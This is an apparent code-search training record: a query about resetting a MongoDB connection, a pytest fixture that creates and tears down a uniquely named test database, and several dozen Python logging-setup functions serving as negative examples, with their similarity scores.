logging.getLogger().addHandler(console)", "def setup_logging(loglevel=logging.INFO):\n\n root = logging.getLogger(__name__)\n root.setLevel(loglevel)\n ch = logging.StreamHandler(sys.stderr)\n ch.setLevel(loglevel)\n formatter = logging.Formatter('[%(asctime)s] %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n root.propagate = False", "def __logger_console(self):\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(self.__formatter)\n console_handler.setLevel(logging.INFO)\n self.__logger.addHandler(console_handler)", "def start_logging() -> logging.RootLogger:\r\n # Defines the format of the logged messages.\r\n log_format = \"%(levelname)s | %(asctime)s | %(message)s\"\r\n # Configures logging, logs all messages >= 20 (INFO).\r\n logging.basicConfig(filename=app.config[\"log_file_name\"],\r\n format=log_format,\r\n level=logging.INFO)\r\n # Handle on the logger.\r\n logger = logging.getLogger()\r\n return logger", "def setupLogging(self):\n\t\ttry:\n\t\t\tself.logger = logging.getLogger(__name__)\n\t\t\thandler = RotatingFileHandler(self.logFile, maxBytes=500000, backupCount=5)\n\t\t\tformat = \"%(asctime)s %(levelname)-8s %(message)s\"\n\t\t\thandler.setFormatter(logging.Formatter(format))\n\t\t\thandler.setLevel(logging.INFO)\n\t\t\tself.logger.addHandler(handler)\n\t\t\tself.logger.setLevel(logging.INFO)\n\t\texcept Exception as err:\n\t\t\terrorStr = 'Error initializing log file, ',err\n\t\t\tprint(errorStr)\n\t\t\texit(1)", "def setup_logger(self):\n setup_logger(logger, 'mayavi.log', mode=self.log_mode)", "def setup_logging():\n for name, logger in loggers.items():\n logger.setLevel(LOGGING_MAPPING.get(options.logging, logging.DEBUG))\n handler = logging.FileHandler(\n getattr(options, '{}_log_file_path'.format(name))\n )\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)", "def configure():\n # TODO: Simple configuration of what to log and where to log it to\n level_name = getenv(\"LOGLEVEL\", \"INFO\")\n level = getattr(logging, 
level_name)\n logging.basicConfig(stream=sys.stdout, filemode=\"w\", level=level)\n\n for handler in logging.root.handlers:\n handler.addFilter(Whitelist(\"mara\", \"tests\"))", "def setup_logging(log_dir: Optional[str] = None) -> None:\n config: Dict[str, Any] = {\n \"version\": 1,\n \"disable_existing_loggers\": True,\n \"formatters\": {\"console\": {\"format\": \"%(asctime)s:\\t%(message)s\"}},\n \"handlers\": {\n \"console\": {\n \"level\": \"WARNING\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"console\",\n \"stream\": \"ext://sys.stdout\",\n }\n },\n \"loggers\": {\n LOG_NAME: {\"handlers\": [\"console\"], \"level\": \"DEBUG\", \"propagate\": False}\n },\n }\n if log_dir is not None:\n config[\"loggers\"][LOG_NAME][\"handlers\"].append(\"file\")\n config[\"formatters\"][\"file\"] = {\n \"format\": \"%(asctime)s - %(levelname)s - %(name)s - %(message)s\"\n }\n config[\"handlers\"][\"file\"] = {\n \"level\": \"DEBUG\",\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"formatter\": \"file\",\n \"filename\": os.path.join(log_dir, LOG_NAME + \".log\"),\n \"maxBytes\": 1000000,\n \"backupCount\": 3,\n }\n logging.config.dictConfig(config)", "def init_logger(verbosity):\n # Register our logging handler\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(verbosity)\n rootLogger = logging.getLogger('')\n rootLogger.addHandler(handler)\n\n # Decrease the log level of the root logger if needed\n if verbosity < rootLogger.level:\n rootLogger.setLevel(verbosity)", "def setup_global_logging():\n\n global global_logging_started\n\n if global_logging_started:\n return\n\n orig_logger_class = logging.getLoggerClass()\n logging.setLoggerClass(StreamTeeLogger)\n try:\n stdout_logger = logging.getLogger(__name__ + '.stdout')\n stderr_logger = logging.getLogger(__name__ + '.stderr')\n finally:\n logging.setLoggerClass(orig_logger_class)\n\n stdout_logger.setLevel(logging.INFO)\n stderr_logger.setLevel(logging.ERROR)\n stdout_logger.set_stream(sys.stdout)\n stderr_logger.set_stream(sys.stderr)\n sys.stdout = stdout_logger\n sys.stderr = stderr_logger\n\n exception_logger = logging.getLogger(__name__ + '.exc')\n sys.excepthook = LoggingExceptionHook(exception_logger)\n\n logging.captureWarnings(True)\n\n rawinput = 'input'\n builtins._original_raw_input = getattr(builtins, rawinput)\n setattr(builtins, rawinput, global_logging_raw_input)\n\n global_logging_started = True", "def setup_logger():\n now = datetime.now()\n logging.basicConfig(level=logging.DEBUG)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n logging.info(f\"Script run on: {now}\")", "def init_logger():\n logging.basicConfig(\n stream=sys.stdout,\n level=logging.INFO,\n format='%(asctime)s.%(msecs)03d %(name)s:%(lineno)d %(levelname)s %(message)s',\n datefmt='%m-%d %H:%M:%S',\n )", "def _configure_logging(self):\n pass", "def setup_root_logger(loglevel=logging.DEBUG, logdir=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'Logs'),\n log_config_file=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'Utils', 'cent_logger.json')):\n try:\n\n if not os.path.isdir(logdir):\n os.makedirs(logdir)\n\n if log_config_file is not None and os.path.exists(log_config_file):\n with open(log_config_file, 'rt') as logconf:\n config = json.load(logconf)\n # create absolute path for logfile\n config['handlers']['file_handler']['filename'] = logdir + '/' + config['handlers']['file_handler']['filename']\n 
config['handlers']['longterm']['filename'] = logdir + '/' + config['handlers']['longterm']['filename']\n config['handlers']['single_run']['filename'] = logdir + '/' + config['handlers']['single_run']['filename']\n root_logger = logging.getLogger(\"framework\")\n logging.config.dictConfig(config)\n logger.info(\"I initialized the framework logger\")\n root_logger.info(\"Configured basic root logger from: {}\".format(log_config_file))\n test_logger = logging.getLogger(\"tests\")\n logging.config.dictConfig(config)\n logger.info(\"I initialized the tests logger\")\n test_logger.info(\"Configured basic tests logger from: {}\".format(log_config_file))\n\n # disable logs from below external modules\n for disabled_module in config['disable_module_logs']:\n root_logger.debug('Disabled logging for module: {}'.format(disabled_module))\n logging.getLogger(disabled_module).disabled = True\n\n except Exception as e:\n print(\"Error configuring logger: {}\".format(e), file=sys.stderr)\n raise e#", "def __setup_logging(self):\n\n loglevel = logging.INFO\n if self.config[\"verbose\"]:\n loglevel = logging.DEBUG\n\n FORMAT = '[%(asctime)s %(filename)s:%(lineno)s %(levelname)s] %(message)s'\n if self.config[\"log\"]:\n logging.basicConfig(format=FORMAT, level=loglevel, filename=self.config[\"log\"])\n else:\n logging.basicConfig(format=FORMAT, level=loglevel)", "def _init_logger(self):\n # Create log directory, if it doesn't already exist.\n self._create_directory(directory=self._log_directory)\n log_filename = \"{0}/{1}.log\".format(self._log_directory, self._program)\n\n # Add the date to the log file names.\n logging.basicConfig(\n filename=log_filename,\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s|%(name)s|%(levelname)-5s| %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S %p')\n\n # define a Handler which writes LOG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n #\n # Note: Anything above the logging level is displayed to stdout.\n #\n # Level Numeric value\n # CRITICAL\t50\n # ERROR \t40\n # WARNING\t30\n # LOG 25 (our log level)\n # INFO\t 20\n # DEBUG \t10\n # NOTSET\t0\n #\n # Add a logging level to always display to stderr.\n logging.addLevelName(self._LOG_LEVEL, self._LOG_NAME)\n if self._debug:\n console.setLevel(logging.DEBUG)\n else:\n console.setLevel(self._LOG_LEVEL)\n # Set a format which is simpler for console use.\n formatter = logging.Formatter('%(name)s|%(levelname)-5s| %(message)s')\n console.setFormatter(formatter)\n # Add the handler to the root logger.\n logging.getLogger('').addHandler(console)\n self._logger = logging.getLogger()", "def init_logging():\n logger.setLevel(logging.DEBUG)\n # set a common log format\n logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n # setup our rotating file handler and assign our common formatter to it\n rotating_file_handler = RotatingFileHandler('my_log.log', maxBytes=200000, backupCount=10)\n rotating_file_handler.setFormatter(logFormatter)\n logger.addHandler(rotating_file_handler)\n \n if DEBUG:\n # print to stdout if we are debugging\n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(logFormatter)\n logger.addHandler(stream_handler)", "def setup_logging(use_syslog=False):\n\n LOG.setLevel(logging.INFO)\n if use_syslog:\n ch = SysLogHandler()\n else:\n ch = logging.StreamHandler(sys.stdout)\n ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] '\n '%(levelname)s: %(message)s'))\n LOG.addHandler(ch)", "def 
configure_logging():\n\n level = logging.INFO\n logging.getLogger().setLevel(level)\n logging.basicConfig(\n level=level,\n format=(\n \"[%(asctime)s][%(levelname)s][%(filename)s:%(lineno)d]\"\n + \"[%(processName)s] %(message)s\"\n ),\n )", "def _init_logging(self):\n # Setup logging variable\n self.log = logging.getLogger(\"collection-log\")\n self.log.setLevel(logging.INFO)\n self.formatter = logging.Formatter(\"%(asctime)s %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n\n # Log to stdout\n streamhandler = logging.StreamHandler()\n streamhandler.setLevel(logging.INFO)\n streamhandler.setFormatter(self.formatter)\n self.log.addHandler(streamhandler)", "def init_logging():\n global logger\n logger = logging.getLogger('autogen_quartus')", "def set_up_logger(self, logger_name):\n\t\tself.logger = logging.getLogger(logger_name)\n\t\tself.logger.setLevel(logging.INFO)\n\t\tconsole_handler = logging.StreamHandler()\n\t\tfile_handler = logging.FileHandler('main_coordinator.log', 'w+')\n\t\tconsole_handler.setLevel(logging.INFO)\n\t\tfile_handler.setLevel(logging.INFO)\n\t\tconsole_format = logging.Formatter('%(name)s - %(levelname)s - %(message)s')\n\t\tfile_format = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\t\tconsole_handler.setFormatter(console_format)\n\t\tfile_handler.setFormatter(file_format)\n\t\tself.logger.addHandler(console_handler)\n\t\tself.logger.addHandler(file_handler)", "def setup_logger(logLevel=\"DEBUG\"):\n logroot = logging.getLogger(\"c\")\n logroot.propagate = False\n logroot.setLevel(logLevel)\n\n module_console_handler = logging.StreamHandler()\n\n # log_format_module = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n # log_format_module = \"%(name)s - %(levelname)s: %(message)s\"\n # log_format_module = '%(levelname)s: %(message)s'\n log_format_module = \"%(name)s: %(message)s\"\n # log_format_module = \"%(message)s\"\n\n formatter = logging.Formatter(log_format_module)\n module_console_handler.setFormatter(formatter)\n\n logroot.addHandler(module_console_handler)\n\n logging.addLevelName(5, \"TRACE\")\n # use it like this\n # logroot.log(5, 'Exceedingly verbose debug')\n\n # example log line\n logg = logging.getLogger(f\"c.{__name__}.setup_logger\")\n logg.debug(f\"Done setting up logger\")", "def _init_logger(self):\n self.logger = logging.getLogger('WSClientAPILogger')\n self.logger.setLevel(logging.DEBUG)\n self.logger_handler = logging.FileHandler(self.__class__.__name__ + '.log')\n self.logger_handler.setLevel(logging.DEBUG)\n self.logger_formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%d-%m %H:%M:%S')\n self.logger_handler.setFormatter(self.logger_formatter)\n self.logger.addHandler(self.logger_handler)", "def setup():\n global log_handler\n\n if vaex.settings.main.logging.setup:\n logger.setLevel(logging.DEBUG)\n\n # create console handler and accept all loglevels\n if vaex.settings.main.logging.rich:\n from rich.logging import RichHandler\n log_handler = RichHandler()\n else:\n log_handler = logging.StreamHandler()\n\n # create formatter\n formatter = logging.Formatter('%(levelname)s:%(threadName)s:%(name)s:%(message)s')\n\n\n # add formatter to console handler\n log_handler.setFormatter(formatter)\n log_handler.setLevel(logging.DEBUG)\n\n # add console handler to logger\n logger.addHandler(log_handler)\n\n logging.getLogger(\"vaex\").setLevel(logging.ERROR) # default to higest level\n _set_log_level(vaex.settings.main.logging.error, logging.ERROR)\n 
_set_log_level(vaex.settings.main.logging.warning, logging.WARNING)\n _set_log_level(vaex.settings.main.logging.info, logging.INFO)\n _set_log_level(vaex.settings.main.logging.debug, logging.DEBUG)\n # VAEX_DEBUG behaves similar to VAEX_LOGGING_DEBUG, but has more effect\n DEBUG_MODE = os.environ.get('VAEX_DEBUG', '')\n if DEBUG_MODE:\n _set_log_level(DEBUG_MODE, logging.DEBUG)", "def setup_logfile():\r\n from core.general.appinit import log_init\r\n log_init(\r\n 'general',\r\n 'django_api'\r\n )", "def config_logging():\n\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n \"[%(asctime)s][%(levelname)s] %(name)s %(filename)s:%(funcName)s:%(lineno)d | %(message)s\")\n\n # Enable debug HTTP request/response\n if root_logger.getEffectiveLevel() == logging.DEBUG:\n http_client.HTTPConnection.debuglevel = 1\n else:\n http_client.HTTPConnection.debuglevel = 0\n\n zabbix_handler = logging.StreamHandler(sys.stdout)\n zabbix_handler.setFormatter(formatter)\n root_logger.addHandler(zabbix_handler)\n return root_logger", "def startlogging(self):\n loglevel = self.config['loglevel']\n logfilelevel = self.config['logfilelevel']\n # -v and -vv options only affect stdout logging\n loglevel = (loglevel, 'debug', 'all')[DEBUG] \n logging.basicConfig(level=self.loglevels[loglevel],\n format=self.config['logformat'],\n datefmt='%H:%M:%S')\n logging.addLevelName(5, 'ALL')\n # now define a logging handler for stdout\n logfile = logging.FileHandler('tangled.log')\n logfile.setLevel(self.loglevels[logfilelevel])\n formatter = logging.Formatter(self.config['logformat'], \n self.config['datefmt'])\n logfile.setFormatter(formatter)\n logging.getLogger('').addHandler(logfile)\n logging.info('New logging session at level {}'.format(loglevel))", "def _init_logging(verbosity=0, log_filename=None):\n\n root_logger = logging.getLogger()\n root_logger.handlers = []\n root_logger.addHandler(logging.NullHandler())\n\n sats_logger = logging.getLogger('sats')\n\n # Have the logger itself set with the lowest possible level\n sats_logger.setLevel(logging.DEBUG)\n # Reset any handlers that might have been set accidentally\n sats_logger.handlers = []\n\n # Always at least INFO in .flog\n file_level = logging.INFO\n\n if verbosity <= -2:\n stdout_level = logging.CRITICAL\n elif verbosity <= -1:\n stdout_level = logging.ERROR\n elif verbosity >= 1:\n stdout_level = logging.DEBUG\n file_level = logging.DEBUG\n else:\n stdout_level = logging.INFO\n\n # add the file handler only if a name is given\n if log_filename is not None:\n file_handler = logging.FileHandler(log_filename)\n file_handler.setLevel(file_level)\n formatter = logging.Formatter('[%(asctime)s] %(levelname)s '\n '<%(module)s.%(funcName)s> '\n '%(message)s',\n datefmt='%Y%m%d %H:%M:%S')\n file_handler.setFormatter(formatter)\n sats_logger.addHandler(file_handler)\n\n # Make these uniform widths\n logging.addLevelName(10, '--')\n logging.addLevelName(20, '>>')\n logging.addLevelName(30, '**')\n logging.addLevelName(40, '!!')\n logging.addLevelName(50, 'XX')\n\n # Use nice coloured console output\n console = ColouredConsoleHandler(stream=sys.stdout)\n console.setLevel(stdout_level)\n formatter = logging.Formatter('%(levelname)s %(message)s')\n console.setFormatter(formatter)\n # add the handler to the root logger\n sats_logger.addHandler(console)", "def _setup_cmd_logger():\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = ColoredFormatter('%(log_color)s[%(levelname)8s] 
%(message)s%(reset)s')\n ch.setLevel(level=logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)", "def init_logger():\n logpath = Path(f\"logs/{time.strftime('%Y.%m.%d %H:%M')}.txt\")\n logpath.parent.mkdir(exist_ok=True)\n logging.basicConfig(filename=logpath, level=logging.DEBUG)", "def __init__(self, default_level=logging.WARNING):\n # All loggers are an attr of self for tab completion in iPython\n # (with . replaced with _)\n self._loggerdict = logging.Logger.manager.loggerDict\n for name, logger in self._loggerdict.iteritems():\n attr = name.replace('.', '_')\n setattr(self, attr, logger)\n\n if len(logging.root.handlers) == 0:\n # The default level is INFO\n fmt='%(levelname)-7s | %(asctime)-23s | %(name)-8s | %(message)s'\n logging.basicConfig(format=fmt, level=default_level)\n logging.StreamHandler.emit = self._emit_wrap", "def _initialize_logging(self):\n LOG_CFG = os.environ.get('LOG_CFG', 'LOCAL')\n configure_logging(LOG_CFG)\n self.logger = logging.getLogger(self.__class__.__name__)", "def setup_logging():\n log_format = '%(asctime)-15s %(levelname)s: %(message)s'\n logging.basicConfig(format=log_format, level=logging.DEBUG,\n filename='counting_consumer.out')", "def setupLogging():\n global enabled, dummyInstance\n from pyemma.util.config import conf_values\n args = conf_values['Logging']\n\n if args.enabled:\n if args.tofile and args.file:\n filename = args.file\n else:\n filename = None\n try:\n logging.basicConfig(level=args.level,\n format=args.format,\n datefmt='%d-%m-%y %H:%M:%S',\n filename=filename,\n filemode='a')\n except IOError as ie:\n import warnings\n warnings.warn('logging could not be initialized, because of %s' % ie)\n return\n \"\"\" in case we want to log to both file and stream, add a separate handler\"\"\"\n if args.toconsole and args.tofile:\n ch = logging.StreamHandler()\n ch.setLevel(args.level)\n ch.setFormatter(logging.Formatter(args.format))\n logging.getLogger('').addHandler(ch)\n else:\n dummyInstance = dummyLogger()\n\n enabled = args.enabled", "def init_logger():\n lformat = \"%(asctime)s [%(levelname)-5.5s] [%(name)s] [%(threadName)-12.12s] %(message)s\"\n\n logging.basicConfig(\n level=logging.INFO,\n format=lformat,\n )\n\n file_handler = handlers.RotatingFileHandler(\n \"{0}/{1}.log\".format('.', 'meta-meta-hive'),\n maxBytes=(50*1024*1024),\n backupCount=7\n )\n file_handler.setFormatter(logging.Formatter(lformat))\n logging.getLogger().addHandler(file_handler)\n return", "def init_logging():\n global logger\n logging.basicConfig(\n format='%(levelname)s - %(message)s',\n )\n logger = logging.getLogger('runner')\n logger.setLevel(os.environ.get('LOGGING_LEVEL', 'INFO'))", "def configure_logging():\n dictConfig(DEFAULT_LOGGING)\n\n default_formatter = logging.Formatter(\n \"%(asctime)s [%(levelname)s] [PID:%(process)d TID:%(thread)d] [%(filename)s:%(lineno)s in `%(funcName)s`] %(message)s\",\n \"%Y-%m-%d %H:%M:%S\")\n\n # file_handler = logging.handlers.RotatingFileHandler(logfile_path, maxBytes=10485760,backupCount=300, encoding='utf-8')\n # file_handler.setLevel(logging.INFO)\n\n if len(logging.getLogger().handlers) > 0:\n for h in logging.getLogger().handlers:\n if isinstance(h, logging.StreamHandler):\n # Then we found a logger to the terminal\n h.setLevel(logging.DEBUG)\n h.setFormatter(default_formatter)\n\n else:\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(default_formatter)\n logging.root.addHandler(console_handler)\n\n\n 
logging.root.setLevel(logging.WARNING)", "def __init__(self):\n ## Creating the looger\n self.logger = logging.getLogger('iLiner_Logger')\n ## Setting the level for the logger\n self.logger.setLevel(logging.DEBUG)\n ## Creating the handler\n stdout_handler = logging.StreamHandler(sys.stdout)\n ## Creating the formatter\n formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(logging.DEBUG)\n self.logger.addHandler(stdout_handler)", "def setup_logger():\n formatter = ColoredFormatter(\n (\n '%(log_color)s%(levelname)-5s%(reset)s '\n '%(yellow)s[%(asctime)s]%(reset)s'\n '%(green)s %(name)s %(purple)s %(filename)s %(purple)s %(funcName)s %(purple)s:%(lineno)d%(reset)s '\n '%(bold_blue)s%(message)s%(reset)s'\n ),\n datefmt='%y-%m-%d %H;%M:%S',\n log_colors={\n 'DEBUG': 'blue',\n 'INFO': 'yellow',\n 'WARNING': 'red',\n 'ERROR': 'blue,bg_bold_red',\n 'CRITICAL': 'red,bg_white',\n }\n )\n\n logger = logging.getLogger('shen-yue-is-beautiful')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n return logger", "def startLogger(self):\n #------------------------------------------\n # Initialize logger\n log_level = getattr(logging, str(self.loglevel).upper())\n logging.basicConfig(filename=self.logfile,level=log_level, format=DEFAULT_LOG_FORMAT)\n logging.info(START_STRING)", "def init_logs():\n\n #Ensure that the directories are made\n make_dirs()\n\n #Create FileHandler logging handler, set it's log level, configure the log storage format,\n # and add the formatter to the root logger\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n logging.root.addHandler(fh)\n logging.root.setLevel(logging.INFO)\n\n #Report it to the world!\n logging.info(\"Saving logs to \" + log_file)", "def _configure_logging(self):\n self.log_level = Scaffold.LOG_LEVEL_MAP.get(self.log_level, ERROR)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # assign the windmill instance logger\n #logging.basicConfig()\n self.log = logging.getLogger(self.name)\n self.log.setLevel(self.log_level)\n\n if self.log_path:\n file_path = None\n if self.log_path.endswith('.log'):\n file_path = self.log_path\n else:\n file_path = os.path.join(self.log_path, self.name + '.log')\n assert file_path\n file_handler = logging.FileHandler(file_path)\n file_handler.setLevel(self.log_level)\n file_handler.setFormatter(formatter)\n self.log.addHandler(file_handler)\n\n # if we are in verbose mode, then we send log output to console\n if self.verbose:\n # add the console logger for verbose mode\n console_handler = logging.StreamHandler()\n console_handler.setLevel(self.log_level)\n console_handler.setFormatter(formatter)\n self.log.addHandler(console_handler)\n\n self.log.info('Logging configured for: %s', self.name)", "def configure_logger (max_threads):\n\t\t# Hack for log line separator\n\t\twith open(\"pinger.log\", \"a\") as log:\n\t\t\tlog.write(\n\t\t\t\t\"==============================================================================================\\n\")\n\n\t\tlogging.basicConfig(filename=\"pinger.log\", level=logging.DEBUG, filemode='a',\n\t\t format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s', datefmt='%d.%m.%Y %H:%M:%S')\n\t\tlogging.info(\"Started with max threads: %d\", max_threads)", "def 
init():\n global logger\n\n with open(\"/app/log.json\", \"r\") as fd:\n logging.config.dictConfig(json.load(fd))\n\n logger = logging.getLogger()", "def setup_logging(log_dir=None, quiet=False):\n global _setup_done\n\n if _setup_done:\n return\n _setup_done = True\n\n _root.handlers = [] # Remove any handlers already attached\n _root.setLevel(\"DEBUG\")\n\n stream = StreamHandler()\n stream.setLevel(\"ERROR\" if quiet else \"DEBUG\")\n stream.setFormatter(_ColorFormatter())\n _root.addHandler(stream)\n\n if log_dir:\n _setup_file_logging(log_dir)\n\n if quiet:\n _disable_pywikibot_logging()", "def start(self):\n log.startLoggingWithObserver(self.emit, setStdout=0)", "def logger_settings(self):\n LOG_CONFIG['root']['handlers'].append(self.logmode)\n flask_log = logging.getLogger(DEFAULT_NAME_FLASK_LOGGER)\n flask_log.setLevel(logging.ERROR)\n dictConfig(LOG_CONFIG)\n self.logger = logging.getLogger()", "def setUp(self):\n self.logger = logging.getLogger(glutil.root_package_name)\n self.orig_handlers = self.logger.handlers\n self.logger.handlers = []\n self.level = self.logger.level\n self.logger.level = logging.DEBUG\n\n self.rt_logger = logging.getLogger()\n self.orig_root_handlers = self.rt_logger.handlers\n self.rt_logger.handlers = []\n self.root_level = self.rt_logger.level\n self.rt_logger.level = logging.CRITICAL", "def setup_logging(log_file):\n\tglobal logger\n\tif log_file:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',filename=log_file,filemode='w',level=logging.INFO)\n\telse:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=logging.INFO)\n\tlogger = logging.getLogger('default')", "def setup_logger():\n logger = logging.getLogger(\"extract_brass_bedpe\")\n LoggerFormat = '[%(levelname)s] [%(asctime)s] [%(name)s] - %(message)s'\n logger.setLevel(level=logging.INFO)\n handler = logging.StreamHandler(sys.stderr)\n formatter = logging.Formatter(LoggerFormat, datefmt='%Y%m%d %H:%M:%S')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger", "def setup_logger_console(log_level='info'):\n # Configureer threshold log level DEBUG voor de root logger (i.p.v. 
WARNING).\n setup_logger()\n\n # Configureer de console handler.\n console_handler = customize_handler(logging.StreamHandler(), log_level)\n # Koppel console handler aan de root logger.\n logging.getLogger('').addHandler(console_handler)\n\n return console_handler", "def init_log(log_level=logging.DEBUG):\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y%m%d')\n file_name = os.path.abspath(os.path.join(os.getcwd(), '..', 'traffic_logs', f'{ts}_traffic.log'))\n folder, _ = os.path.split(file_name)\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n # create formatter and add it to the handlers\n log_format = '[%(asctime)s][%(name)s][%(levelname)s] %(message)s'\n\n logging.basicConfig(filemode='a',\n format=log_format,\n datefmt='%H:%M:%S',\n level=logging.ERROR,\n stream=sys.stdout,\n # filename=file_handler\n )\n\n formatter = logging.Formatter(log_format)\n\n # create file handler which logs even debug messages\n file_handler = logging.FileHandler(file_name)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(log_level)\n\n std_out = logging.StreamHandler(sys.stdout)\n std_out.setFormatter(formatter)\n std_out.setLevel(log_level)\n\n # This for avoiding streams to log to root's stderr, which prints in red in jupyter\n root_logger = logging.getLogger()\n for handler in root_logger.handlers:\n # continue\n root_logger.removeHandler(handler)\n\n # add the handlers to the logger\n root_logger.addHandler(file_handler)\n\n # By default the install() function installs a file_handler on the root root_logger,\n # this means that log messages from your code and log messages from the\n # libraries that you use will all show up on the terminal.\n coloredlogs.install(level=log_level, fmt=log_format, stream=sys.stdout)", "def setup_logging(log_level=logging.DEBUG):\n logging.basicConfig(level=log_level)\n fmt = \"%(asctime)s %(levelname)s (%(threadName)s) \" \"[%(name)s] %(message)s\"\n colorfmt = \"%(log_color)s{}%(reset)s\".format(fmt)\n datefmt = \"%Y-%m-%d %H:%M:%S\"\n\n try:\n from colorlog import ColoredFormatter\n\n logging.getLogger().handlers[0].setFormatter(\n ColoredFormatter(\n colorfmt,\n datefmt=datefmt,\n reset=True,\n log_colors={\n \"DEBUG\": \"cyan\",\n \"INFO\": \"green\",\n \"WARNING\": \"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red\",\n },\n )\n )\n except ImportError:\n pass\n\n logger = logging.getLogger(\"\")\n logger.setLevel(log_level)" ]
[ "0.7975957", "0.7763486", "0.7686616", "0.75928164", "0.7581792", "0.7508208", "0.73854136", "0.73814046", "0.73402363", "0.7313796", "0.7308403", "0.73038954", "0.7274763", "0.7260364", "0.72556174", "0.7249487", "0.7241462", "0.72125137", "0.71615887", "0.71491545", "0.71091515", "0.7103326", "0.7095999", "0.709512", "0.7049582", "0.7035433", "0.70290786", "0.70194244", "0.7004849", "0.6997841", "0.6995546", "0.6927218", "0.68749934", "0.68704", "0.6854737", "0.6854089", "0.6841452", "0.68369216", "0.6830694", "0.67888016", "0.6780664", "0.6774768", "0.6771184", "0.6764732", "0.6753929", "0.6746233", "0.67414236", "0.6734909", "0.67338765", "0.6720437", "0.6709257", "0.6686435", "0.66845685", "0.6683992", "0.66833776", "0.66830623", "0.6682749", "0.6676036", "0.6655509", "0.6653659", "0.6651137", "0.665037", "0.6645409", "0.66347736", "0.66312695", "0.663053", "0.6628443", "0.6624574", "0.6621065", "0.66167253", "0.66118777", "0.6605791", "0.66054404", "0.65997785", "0.6591973", "0.65883154", "0.6587484", "0.6582215", "0.65716255", "0.6563003", "0.6555068", "0.6549678", "0.6549322", "0.6542105", "0.65340203", "0.6515089", "0.6505407", "0.6467465", "0.64670444", "0.6460377", "0.6452387", "0.6446658", "0.64435494", "0.6441619", "0.64402413", "0.64396524", "0.64386046", "0.64168006", "0.64114296", "0.64056885", "0.6397454" ]
0.0
-1
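The negative examples above all revolve around wiring up Python's logging module. A minimal, self-contained sketch of the pattern most of them share (a stream handler, an explicit formatter, and a level applied to the root logger) follows; every name below is chosen for illustration and is taken from no particular snippet:

import logging
import sys

def setup_basic_logging(level=logging.INFO):
    # Shared pattern from the snippets above: send records to stdout with a timestamped format.
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(logging.Formatter(
        "[%(asctime)s] %(levelname)s in %(module)s: %(message)s"))
    root = logging.getLogger()
    root.setLevel(level)
    root.addHandler(handler)
    return root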
Set up a mongo connection reset and ready to roll.
def mongodb(request):
    from pp.user.model import db as mongo

    log = get_log('mongodb')

    db_name = "testingdb-{}".format(uuid.uuid4().hex)
    mongo.init(dict(db_name=db_name))
    db = mongo.db()
    db.hard_reset()
    log.info('database ready for testing "{}"'.format(db_name))

    def db_teardown(x=None):
        db.hard_reset()
        log.warn('teardown database for testing "{}"'.format(db_name))

    request.addfinalizer(db_teardown)

    return db
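A minimal usage sketch for a fixture like the one above, assuming it is registered with pytest so a test receives the freshly reset database by naming the fixture as an argument; the test function, the `profiles` collection name, and the pymongo-style `insert_one`/`find_one` calls on the returned object are illustrative assumptions, not part of the original record:

def test_profile_roundtrip(mongodb):
    # 'mongodb' is supplied by the fixture above and starts from a hard-reset database.
    mongodb.profiles.insert_one({"username": "alice"})  # hypothetical collection name
    assert mongodb.profiles.find_one({"username": "alice"}) is not None
    # The registered finalizer hard-resets the database again once the test finishes.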
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
